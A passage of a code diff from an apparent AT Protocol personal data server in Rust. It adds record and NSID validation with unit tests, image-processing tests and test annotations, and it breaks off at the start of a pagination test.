"app.bsky.feed.like" => self.validate_like(obj)?,
86
+
"app.bsky.feed.repost" => self.validate_repost(obj)?,
87
+
"app.bsky.graph.follow" => self.validate_follow(obj)?,
88
+
"app.bsky.graph.block" => self.validate_block(obj)?,
89
+
"app.bsky.graph.list" => self.validate_list(obj)?,
90
+
"app.bsky.graph.listitem" => self.validate_list_item(obj)?,
91
+
"app.bsky.feed.generator" => self.validate_feed_generator(obj)?,
92
+
"app.bsky.feed.threadgate" => self.validate_threadgate(obj)?,
93
+
"app.bsky.labeler.service" => self.validate_labeler_service(obj)?,
94
+
_ => {
95
+
if self.require_lexicon {
96
+
return Err(ValidationError::UnknownType(record_type.to_string()));
97
+
}
98
+
return Ok(ValidationStatus::Unknown);
99
+
}
100
+
}
101
+
102
+
Ok(ValidationStatus::Valid)
103
+
}
104
+
105
+
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
106
+
if !obj.contains_key("text") {
107
+
return Err(ValidationError::MissingField("text".to_string()));
108
+
}
109
+
110
+
if !obj.contains_key("createdAt") {
111
+
return Err(ValidationError::MissingField("createdAt".to_string()));
112
+
}
113
+
114
+
if let Some(text) = obj.get("text").and_then(|v| v.as_str()) {
115
+
let grapheme_count = text.chars().count(); // note: chars() counts Unicode scalar values, not true graphemes
116
+
if grapheme_count > 3000 {
117
+
return Err(ValidationError::InvalidField {
118
+
path: "text".to_string(),
119
+
message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count),
120
+
});
121
+
}
122
+
}
123
+
124
+
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) {
125
+
if langs.len() > 3 {
126
+
return Err(ValidationError::InvalidField {
127
+
path: "langs".to_string(),
128
+
message: "Maximum 3 languages allowed".to_string(),
129
+
});
130
+
}
131
+
}
132
+
133
+
if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
134
+
if tags.len() > 8 {
135
+
return Err(ValidationError::InvalidField {
136
+
path: "tags".to_string(),
137
+
message: "Maximum 8 tags allowed".to_string(),
138
+
});
139
+
}
140
+
for (i, tag) in tags.iter().enumerate() {
141
+
if let Some(tag_str) = tag.as_str() {
142
+
if tag_str.len() > 640 {
143
+
return Err(ValidationError::InvalidField {
144
+
path: format!("tags/{}", i),
145
+
message: "Tag exceeds maximum length of 640 bytes".to_string(),
146
+
});
147
+
}
148
+
}
149
+
}
150
+
}
151
+
152
+
Ok(())
153
+
}
154
+
155
+
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
156
+
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
157
+
let grapheme_count = display_name.chars().count(); // note: chars() counts Unicode scalar values, not true graphemes
158
+
if grapheme_count > 640 {
159
+
return Err(ValidationError::InvalidField {
160
+
path: "displayName".to_string(),
161
+
message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count),
162
+
});
163
+
}
164
+
}
165
+
166
+
if let Some(description) = obj.get("description").and_then(|v| v.as_str()) {
167
+
let grapheme_count = description.chars().count();
168
+
if grapheme_count > 2560 {
169
+
return Err(ValidationError::InvalidField {
170
+
path: "description".to_string(),
171
+
message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count),
172
+
});
173
+
}
174
+
}
175
+
176
+
Ok(())
177
+
}
178
+
179
+
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
180
+
if !obj.contains_key("subject") {
181
+
return Err(ValidationError::MissingField("subject".to_string()));
182
+
}
183
+
if !obj.contains_key("createdAt") {
184
+
return Err(ValidationError::MissingField("createdAt".to_string()));
185
+
}
186
+
self.validate_strong_ref(obj.get("subject"), "subject")?;
187
+
Ok(())
188
+
}
189
+
190
+
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
191
+
if !obj.contains_key("subject") {
192
+
return Err(ValidationError::MissingField("subject".to_string()));
193
+
}
194
+
if !obj.contains_key("createdAt") {
195
+
return Err(ValidationError::MissingField("createdAt".to_string()));
196
+
}
197
+
self.validate_strong_ref(obj.get("subject"), "subject")?;
198
+
Ok(())
199
+
}
200
+
201
+
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
202
+
if !obj.contains_key("subject") {
203
+
return Err(ValidationError::MissingField("subject".to_string()));
204
+
}
205
+
if !obj.contains_key("createdAt") {
206
+
return Err(ValidationError::MissingField("createdAt".to_string()));
207
+
}
208
+
209
+
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
210
+
if !subject.starts_with("did:") {
211
+
return Err(ValidationError::InvalidField {
212
+
path: "subject".to_string(),
213
+
message: "Subject must be a DID".to_string(),
214
+
});
215
+
}
216
+
}
217
+
218
+
Ok(())
219
+
}
220
+
221
+
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
222
+
if !obj.contains_key("subject") {
223
+
return Err(ValidationError::MissingField("subject".to_string()));
224
+
}
225
+
if !obj.contains_key("createdAt") {
226
+
return Err(ValidationError::MissingField("createdAt".to_string()));
227
+
}
228
+
229
+
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
230
+
if !subject.starts_with("did:") {
231
+
return Err(ValidationError::InvalidField {
232
+
path: "subject".to_string(),
233
+
message: "Subject must be a DID".to_string(),
234
+
});
235
+
}
236
+
}
237
+
238
+
Ok(())
239
+
}
240
+
241
+
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
242
+
if !obj.contains_key("name") {
243
+
return Err(ValidationError::MissingField("name".to_string()));
244
+
}
245
+
if !obj.contains_key("purpose") {
246
+
return Err(ValidationError::MissingField("purpose".to_string()));
247
+
}
248
+
if !obj.contains_key("createdAt") {
249
+
return Err(ValidationError::MissingField("createdAt".to_string()));
250
+
}
251
+
252
+
if let Some(name) = obj.get("name").and_then(|v| v.as_str()) {
253
+
if name.is_empty() || name.len() > 64 {
254
+
return Err(ValidationError::InvalidField {
255
+
path: "name".to_string(),
256
+
message: "Name must be 1-64 characters".to_string(),
257
+
});
258
+
}
259
+
}
260
+
261
+
Ok(())
262
+
}
263
+
264
+
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
265
+
if !obj.contains_key("subject") {
266
+
return Err(ValidationError::MissingField("subject".to_string()));
267
+
}
268
+
if !obj.contains_key("list") {
269
+
return Err(ValidationError::MissingField("list".to_string()));
270
+
}
271
+
if !obj.contains_key("createdAt") {
272
+
return Err(ValidationError::MissingField("createdAt".to_string()));
273
+
}
274
+
Ok(())
275
+
}
276
+
277
+
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
278
+
if !obj.contains_key("did") {
279
+
return Err(ValidationError::MissingField("did".to_string()));
280
+
}
281
+
if !obj.contains_key("displayName") {
282
+
return Err(ValidationError::MissingField("displayName".to_string()));
283
+
}
284
+
if !obj.contains_key("createdAt") {
285
+
return Err(ValidationError::MissingField("createdAt".to_string()));
286
+
}
287
+
288
+
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
289
+
if display_name.is_empty() || display_name.len() > 240 {
290
+
return Err(ValidationError::InvalidField {
291
+
path: "displayName".to_string(),
292
+
message: "displayName must be 1-240 characters".to_string(),
293
+
});
294
+
}
295
+
}
296
+
297
+
Ok(())
298
+
}
299
+
300
+
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
301
+
if !obj.contains_key("post") {
302
+
return Err(ValidationError::MissingField("post".to_string()));
303
+
}
304
+
if !obj.contains_key("createdAt") {
305
+
return Err(ValidationError::MissingField("createdAt".to_string()));
306
+
}
307
+
Ok(())
308
+
}
309
+
310
+
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
311
+
if !obj.contains_key("policies") {
312
+
return Err(ValidationError::MissingField("policies".to_string()));
313
+
}
314
+
if !obj.contains_key("createdAt") {
315
+
return Err(ValidationError::MissingField("createdAt".to_string()));
316
+
}
317
+
Ok(())
318
+
}
319
+
320
+
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
321
+
let obj = value
322
+
.and_then(|v| v.as_object())
323
+
.ok_or_else(|| ValidationError::InvalidField {
324
+
path: path.to_string(),
325
+
message: "Must be a strong reference object".to_string(),
326
+
})?;
327
+
328
+
if !obj.contains_key("uri") {
329
+
return Err(ValidationError::MissingField(format!("{}/uri", path)));
330
+
}
331
+
if !obj.contains_key("cid") {
332
+
return Err(ValidationError::MissingField(format!("{}/cid", path)));
333
+
}
334
+
335
+
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) {
336
+
if !uri.starts_with("at://") {
337
+
return Err(ValidationError::InvalidField {
338
+
path: format!("{}/uri", path),
339
+
message: "URI must be an at:// URI".to_string(),
340
+
});
341
+
}
342
+
}
343
+
344
+
Ok(())
345
+
}
346
+
}
347
+
348
+
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
349
+
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
350
+
return Err(ValidationError::InvalidDatetime {
351
+
path: path.to_string(),
352
+
});
353
+
}
354
+
Ok(())
355
+
}
356
+
357
+
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
358
+
if rkey.is_empty() {
359
+
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
360
+
}
361
+
362
+
if rkey.len() > 512 {
363
+
return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string()));
364
+
}
365
+
366
+
if rkey == "." || rkey == ".." {
367
+
return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string()));
368
+
}
369
+
370
+
let valid_chars = rkey.chars().all(|c| {
371
+
c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~'
372
+
});
373
+
374
+
if !valid_chars {
375
+
return Err(ValidationError::InvalidRecord(
376
+
"Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')".to_string()
377
+
));
378
+
}
379
+
380
+
Ok(())
381
+
}
382
+
383
+
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
384
+
if collection.is_empty() {
385
+
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
386
+
}
387
+
388
+
let parts: Vec<&str> = collection.split('.').collect();
389
+
if parts.len() < 3 {
390
+
return Err(ValidationError::InvalidRecord(
391
+
"Collection NSID must have at least 3 segments".to_string()
392
+
));
393
+
}
394
+
395
+
for part in &parts {
396
+
if part.is_empty() {
397
+
return Err(ValidationError::InvalidRecord(
398
+
"Collection NSID segments cannot be empty".to_string()
399
+
));
400
+
}
401
+
if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') {
402
+
return Err(ValidationError::InvalidRecord(
403
+
"Collection NSID segments must be alphanumeric or hyphens".to_string()
404
+
));
405
+
}
406
+
}
407
+
408
+
Ok(())
409
+
}
410
+
411
+
#[cfg(test)]
412
+
mod tests {
413
+
use super::*;
414
+
use serde_json::json;
415
+
416
+
#[test]
417
+
fn test_validate_post() {
418
+
let validator = RecordValidator::new();
419
+
420
+
let valid_post = json!({
421
+
"$type": "app.bsky.feed.post",
422
+
"text": "Hello, world!",
423
+
"createdAt": "2024-01-01T00:00:00.000Z"
424
+
});
425
+
426
+
assert_eq!(
427
+
validator.validate(&valid_post, "app.bsky.feed.post").unwrap(),
428
+
ValidationStatus::Valid
429
+
);
430
+
}
431
+
432
+
#[test]
433
+
fn test_validate_post_missing_text() {
434
+
let validator = RecordValidator::new();
435
+
436
+
let invalid_post = json!({
437
+
"$type": "app.bsky.feed.post",
438
+
"createdAt": "2024-01-01T00:00:00.000Z"
439
+
});
440
+
441
+
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
442
+
}
443
+
444
+
#[test]
445
+
fn test_validate_type_mismatch() {
446
+
let validator = RecordValidator::new();
447
+
448
+
let record = json!({
449
+
"$type": "app.bsky.feed.like",
450
+
"subject": {"uri": "at://did:plc:test/app.bsky.feed.post/123", "cid": "bafyrei..."},
451
+
"createdAt": "2024-01-01T00:00:00.000Z"
452
+
});
453
+
454
+
let result = validator.validate(&record, "app.bsky.feed.post");
455
+
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
456
+
}
457
+
458
+
#[test]
459
+
fn test_validate_unknown_type() {
460
+
let validator = RecordValidator::new();
461
+
462
+
let record = json!({
463
+
"$type": "com.example.custom",
464
+
"data": "test"
465
+
});
466
+
467
+
assert_eq!(
468
+
validator.validate(&record, "com.example.custom").unwrap(),
469
+
ValidationStatus::Unknown
470
+
);
471
+
}
472
+
473
+
#[test]
474
+
fn test_validate_unknown_type_strict() {
475
+
let validator = RecordValidator::new().require_lexicon(true);
476
+
477
+
let record = json!({
478
+
"$type": "com.example.custom",
479
+
"data": "test"
480
+
});
481
+
482
+
let result = validator.validate(&record, "com.example.custom");
483
+
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
484
+
}
485
+
486
+
#[test]
487
+
fn test_validate_record_key() {
488
+
assert!(validate_record_key("valid-key_123").is_ok());
489
+
assert!(validate_record_key("3k2n5j2").is_ok());
490
+
assert!(validate_record_key(".").is_err());
491
+
assert!(validate_record_key("..").is_err());
492
+
assert!(validate_record_key("").is_err());
493
+
assert!(validate_record_key("invalid/key").is_err());
494
+
}
495
+
496
+
#[test]
497
+
fn test_validate_collection_nsid() {
498
+
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
499
+
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
500
+
assert!(validate_collection_nsid("invalid").is_err());
501
+
assert!(validate_collection_nsid("a.b").is_err());
502
+
assert!(validate_collection_nsid("").is_err());
503
+
}
504
+
}
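
A small sketch of the intended call order when a record arrives via createRecord or putRecord; the helper name is hypothetical and the surrounding handler is not part of this diff.

use serde_json::Value;

// Reject malformed NSIDs and record keys up front, then validate the record
// body against the known lexicons; unrecognised types come back as Unknown.
fn check_incoming_record(
    record: &Value,
    collection: &str,
    rkey: &str,
) -> Result<ValidationStatus, ValidationError> {
    validate_collection_nsid(collection)?;
    validate_record_key(rkey)?;
    RecordValidator::new().validate(record, collection)
}
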
+315
tests/image_processing.rs
···
···
1
+
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
2
+
use image::{DynamicImage, ImageFormat};
3
+
use std::io::Cursor;
4
+
5
+
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
6
+
let img = DynamicImage::new_rgb8(width, height);
7
+
let mut buf = Vec::new();
8
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
9
+
buf
10
+
}
11
+
12
+
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
13
+
let img = DynamicImage::new_rgb8(width, height);
14
+
let mut buf = Vec::new();
15
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
16
+
buf
17
+
}
18
+
19
+
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
20
+
let img = DynamicImage::new_rgb8(width, height);
21
+
let mut buf = Vec::new();
22
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
23
+
buf
24
+
}
25
+
26
+
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
27
+
let img = DynamicImage::new_rgb8(width, height);
28
+
let mut buf = Vec::new();
29
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
30
+
buf
31
+
}
32
+
33
+
#[test]
34
+
fn test_process_png() {
35
+
let processor = ImageProcessor::new();
36
+
let data = create_test_png(500, 500);
37
+
let result = processor.process(&data, "image/png").unwrap();
38
+
assert_eq!(result.original.width, 500);
39
+
assert_eq!(result.original.height, 500);
40
+
}
41
+
42
+
#[test]
43
+
fn test_process_jpeg() {
44
+
let processor = ImageProcessor::new();
45
+
let data = create_test_jpeg(400, 300);
46
+
let result = processor.process(&data, "image/jpeg").unwrap();
47
+
assert_eq!(result.original.width, 400);
48
+
assert_eq!(result.original.height, 300);
49
+
}
50
+
51
+
#[test]
52
+
fn test_process_gif() {
53
+
let processor = ImageProcessor::new();
54
+
let data = create_test_gif(200, 200);
55
+
let result = processor.process(&data, "image/gif").unwrap();
56
+
assert_eq!(result.original.width, 200);
57
+
assert_eq!(result.original.height, 200);
58
+
}
59
+
60
+
#[test]
61
+
fn test_process_webp() {
62
+
let processor = ImageProcessor::new();
63
+
let data = create_test_webp(300, 200);
64
+
let result = processor.process(&data, "image/webp").unwrap();
65
+
assert_eq!(result.original.width, 300);
66
+
assert_eq!(result.original.height, 200);
67
+
}
68
+
69
+
#[test]
70
+
fn test_thumbnail_feed_size() {
71
+
let processor = ImageProcessor::new();
72
+
let data = create_test_png(800, 600);
73
+
let result = processor.process(&data, "image/png").unwrap();
74
+
75
+
let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image");
76
+
assert!(thumb.width <= THUMB_SIZE_FEED);
77
+
assert!(thumb.height <= THUMB_SIZE_FEED);
78
+
}
79
+
80
+
#[test]
81
+
fn test_thumbnail_full_size() {
82
+
let processor = ImageProcessor::new();
83
+
let data = create_test_png(2000, 1500);
84
+
let result = processor.process(&data, "image/png").unwrap();
85
+
86
+
let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image");
87
+
assert!(thumb.width <= THUMB_SIZE_FULL);
88
+
assert!(thumb.height <= THUMB_SIZE_FULL);
89
+
}
90
+
91
+
#[test]
92
+
fn test_no_thumbnail_small_image() {
93
+
let processor = ImageProcessor::new();
94
+
let data = create_test_png(100, 100);
95
+
let result = processor.process(&data, "image/png").unwrap();
96
+
97
+
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
98
+
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
99
+
}
100
+
101
+
#[test]
102
+
fn test_webp_conversion() {
103
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
104
+
let data = create_test_png(300, 300);
105
+
let result = processor.process(&data, "image/png").unwrap();
106
+
107
+
assert_eq!(result.original.mime_type, "image/webp");
108
+
}
109
+
110
+
#[test]
111
+
fn test_jpeg_output_format() {
112
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
113
+
let data = create_test_png(300, 300);
114
+
let result = processor.process(&data, "image/png").unwrap();
115
+
116
+
assert_eq!(result.original.mime_type, "image/jpeg");
117
+
}
118
+
119
+
#[test]
120
+
fn test_png_output_format() {
121
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
122
+
let data = create_test_jpeg(300, 300);
123
+
let result = processor.process(&data, "image/jpeg").unwrap();
124
+
125
+
assert_eq!(result.original.mime_type, "image/png");
126
+
}
127
+
128
+
#[test]
129
+
fn test_max_dimension_enforced() {
130
+
let processor = ImageProcessor::new().with_max_dimension(1000);
131
+
let data = create_test_png(2000, 2000);
132
+
let result = processor.process(&data, "image/png");
133
+
134
+
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
135
+
if let Err(ImageError::TooLarge { width, height, max_dimension }) = result {
136
+
assert_eq!(width, 2000);
137
+
assert_eq!(height, 2000);
138
+
assert_eq!(max_dimension, 1000);
139
+
}
140
+
}
141
+
142
+
#[test]
143
+
fn test_file_size_limit() {
144
+
let processor = ImageProcessor::new().with_max_file_size(100);
145
+
let data = create_test_png(500, 500);
146
+
let result = processor.process(&data, "image/png");
147
+
148
+
assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
149
+
if let Err(ImageError::FileTooLarge { size, max_size }) = result {
150
+
assert!(size > 100);
151
+
assert_eq!(max_size, 100);
152
+
}
153
+
}
154
+
155
+
#[test]
156
+
fn test_default_max_file_size() {
157
+
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
158
+
}
159
+
160
+
#[test]
161
+
fn test_unsupported_format_rejected() {
162
+
let processor = ImageProcessor::new();
163
+
let data = b"this is not an image";
164
+
let result = processor.process(data, "application/octet-stream");
165
+
166
+
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
167
+
}
168
+
169
+
#[test]
170
+
fn test_corrupted_image_handling() {
171
+
let processor = ImageProcessor::new();
172
+
let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
173
+
let result = processor.process(data, "image/png");
174
+
175
+
assert!(matches!(result, Err(ImageError::DecodeError(_))));
176
+
}
177
+
178
+
#[test]
179
+
fn test_aspect_ratio_preserved_landscape() {
180
+
let processor = ImageProcessor::new();
181
+
let data = create_test_png(1600, 800);
182
+
let result = processor.process(&data, "image/png").unwrap();
183
+
184
+
let thumb = result.thumbnail_full.expect("Should have thumbnail");
185
+
let original_ratio = 1600.0 / 800.0;
186
+
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
187
+
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
188
+
}
189
+
190
+
#[test]
191
+
fn test_aspect_ratio_preserved_portrait() {
192
+
let processor = ImageProcessor::new();
193
+
let data = create_test_png(800, 1600);
194
+
let result = processor.process(&data, "image/png").unwrap();
195
+
196
+
let thumb = result.thumbnail_full.expect("Should have thumbnail");
197
+
let original_ratio = 800.0 / 1600.0;
198
+
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
199
+
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
200
+
}
201
+
202
+
#[test]
203
+
fn test_mime_type_detection_auto() {
204
+
let processor = ImageProcessor::new();
205
+
let data = create_test_png(100, 100);
206
+
let result = processor.process(&data, "application/octet-stream");
207
+
208
+
assert!(result.is_ok(), "Should detect PNG format from data");
209
+
}
210
+
211
+
#[test]
212
+
fn test_is_supported_mime_type() {
213
+
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
214
+
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
215
+
assert!(ImageProcessor::is_supported_mime_type("image/png"));
216
+
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
217
+
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
218
+
assert!(ImageProcessor::is_supported_mime_type("IMAGE/PNG"));
219
+
assert!(ImageProcessor::is_supported_mime_type("Image/Jpeg"));
220
+
221
+
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
222
+
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
223
+
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
224
+
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
225
+
}
226
+
227
+
#[test]
228
+
fn test_strip_exif() {
229
+
let data = create_test_jpeg(100, 100);
230
+
let result = ImageProcessor::strip_exif(&data);
231
+
assert!(result.is_ok());
232
+
let stripped = result.unwrap();
233
+
assert!(!stripped.is_empty());
234
+
}
235
+
236
+
#[test]
237
+
fn test_with_thumbnails_disabled() {
238
+
let processor = ImageProcessor::new().with_thumbnails(false);
239
+
let data = create_test_png(2000, 2000);
240
+
let result = processor.process(&data, "image/png").unwrap();
241
+
242
+
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
243
+
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
244
+
}
245
+
246
+
#[test]
247
+
fn test_builder_chaining() {
248
+
let processor = ImageProcessor::new()
249
+
.with_max_dimension(2048)
250
+
.with_max_file_size(5 * 1024 * 1024)
251
+
.with_output_format(OutputFormat::Jpeg)
252
+
.with_thumbnails(true);
253
+
254
+
let data = create_test_png(500, 500);
255
+
let result = processor.process(&data, "image/png").unwrap();
256
+
assert_eq!(result.original.mime_type, "image/jpeg");
257
+
}
258
+
259
+
#[test]
260
+
fn test_processed_image_fields() {
261
+
let processor = ImageProcessor::new();
262
+
let data = create_test_png(500, 500);
263
+
let result = processor.process(&data, "image/png").unwrap();
264
+
265
+
assert!(!result.original.data.is_empty());
266
+
assert!(!result.original.mime_type.is_empty());
267
+
assert!(result.original.width > 0);
268
+
assert!(result.original.height > 0);
269
+
}
270
+
271
+
#[test]
272
+
fn test_only_feed_thumbnail_for_medium_images() {
273
+
let processor = ImageProcessor::new();
274
+
let data = create_test_png(500, 500);
275
+
let result = processor.process(&data, "image/png").unwrap();
276
+
277
+
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
278
+
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
279
+
}
280
+
281
+
#[test]
282
+
fn test_both_thumbnails_for_large_images() {
283
+
let processor = ImageProcessor::new();
284
+
let data = create_test_png(2000, 2000);
285
+
let result = processor.process(&data, "image/png").unwrap();
286
+
287
+
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
288
+
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
289
+
}
290
+
291
+
#[test]
292
+
fn test_exact_threshold_boundary_feed() {
293
+
let processor = ImageProcessor::new();
294
+
295
+
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
296
+
let result = processor.process(&at_threshold, "image/png").unwrap();
297
+
assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail");
298
+
299
+
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
300
+
let result = processor.process(&above_threshold, "image/png").unwrap();
301
+
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
302
+
}
303
+
304
+
#[test]
305
+
fn test_exact_threshold_boundary_full() {
306
+
let processor = ImageProcessor::new();
307
+
308
+
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
309
+
let result = processor.process(&at_threshold, "image/png").unwrap();
310
+
assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail");
311
+
312
+
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
313
+
let result = processor.process(&above_threshold, "image/png").unwrap();
314
+
assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail");
315
+
}
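
The API exercised by these tests suggests a flow like the following inside a blob-upload handler; the function name, variables, and the choice to re-encode as WebP are illustrative assumptions, not code from this PR.

use bspds::image::{ImageProcessor, OutputFormat};

// `bytes` and `content_type` would come from the uploadBlob request.
fn process_upload(bytes: &[u8], content_type: &str) {
    if !ImageProcessor::is_supported_mime_type(content_type) {
        return; // non-image blobs would be stored as-is
    }
    let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
    match processor.process(bytes, content_type) {
        Ok(processed) => {
            // processed.original is the re-encoded full image; the thumbnails
            // are only present when the input exceeds the size thresholds.
            let _ = (processed.original, processed.thumbnail_feed, processed.thumbnail_full);
        }
        Err(err) => {
            // Map ImageError variants (FileTooLarge, TooLarge, UnsupportedFormat, ...)
            // onto an appropriate XRPC error response.
            eprintln!("image processing failed: {err:?}");
        }
    }
}
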
+5
tests/import_with_verification.rs
···
217
}
218
219
#[tokio::test]
220
async fn test_import_with_valid_signature_and_mock_plc() {
221
let client = client();
222
let (token, did) = create_account_and_login(&client).await;
···
266
}
267
268
#[tokio::test]
269
async fn test_import_with_wrong_signing_key_fails() {
270
let client = client();
271
let (token, did) = create_account_and_login(&client).await;
···
322
}
323
324
#[tokio::test]
325
async fn test_import_with_did_mismatch_fails() {
326
let client = client();
327
let (token, did) = create_account_and_login(&client).await;
···
373
}
374
375
#[tokio::test]
376
async fn test_import_with_plc_resolution_failure() {
377
let client = client();
378
let (token, did) = create_account_and_login(&client).await;
···
424
}
425
426
#[tokio::test]
427
async fn test_import_with_no_signing_key_in_did_doc() {
428
let client = client();
429
let (token, did) = create_account_and_login(&client).await;
···
217
}
218
219
#[tokio::test]
220
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_valid_signature_and_mock_plc -- --ignored --test-threads=1"]
221
async fn test_import_with_valid_signature_and_mock_plc() {
222
let client = client();
223
let (token, did) = create_account_and_login(&client).await;
···
267
}
268
269
#[tokio::test]
270
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_wrong_signing_key_fails -- --ignored --test-threads=1"]
271
async fn test_import_with_wrong_signing_key_fails() {
272
let client = client();
273
let (token, did) = create_account_and_login(&client).await;
···
324
}
325
326
#[tokio::test]
327
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_did_mismatch_fails -- --ignored --test-threads=1"]
328
async fn test_import_with_did_mismatch_fails() {
329
let client = client();
330
let (token, did) = create_account_and_login(&client).await;
···
376
}
377
378
#[tokio::test]
379
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_plc_resolution_failure -- --ignored --test-threads=1"]
380
async fn test_import_with_plc_resolution_failure() {
381
let client = client();
382
let (token, did) = create_account_and_login(&client).await;
···
428
}
429
430
#[tokio::test]
431
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_no_signing_key_in_did_doc -- --ignored --test-threads=1"]
432
async fn test_import_with_no_signing_key_in_did_doc() {
433
let client = client();
434
let (token, did) = create_account_and_login(&client).await;
+554
tests/list_records_pagination.rs
···
···
1
+
mod common;
2
+
mod helpers;
3
+
use common::*;
4
+
use helpers::*;
5
+
6
+
use chrono::Utc;
7
+
use reqwest::StatusCode;
8
+
use serde_json::{Value, json};
9
+
use std::time::Duration;
10
+
11
+
async fn create_post_with_rkey(
12
+
client: &reqwest::Client,
13
+
did: &str,
14
+
jwt: &str,
15
+
rkey: &str,
16
+
text: &str,
17
+
) -> (String, String) {
18
+
let payload = json!({
19
+
"repo": did,
20
+
"collection": "app.bsky.feed.post",
21
+
"rkey": rkey,
22
+
"record": {
23
+
"$type": "app.bsky.feed.post",
24
+
"text": text,
25
+
"createdAt": Utc::now().to_rfc3339()
26
+
}
27
+
});
28
+
29
+
let res = client
30
+
.post(format!(
31
+
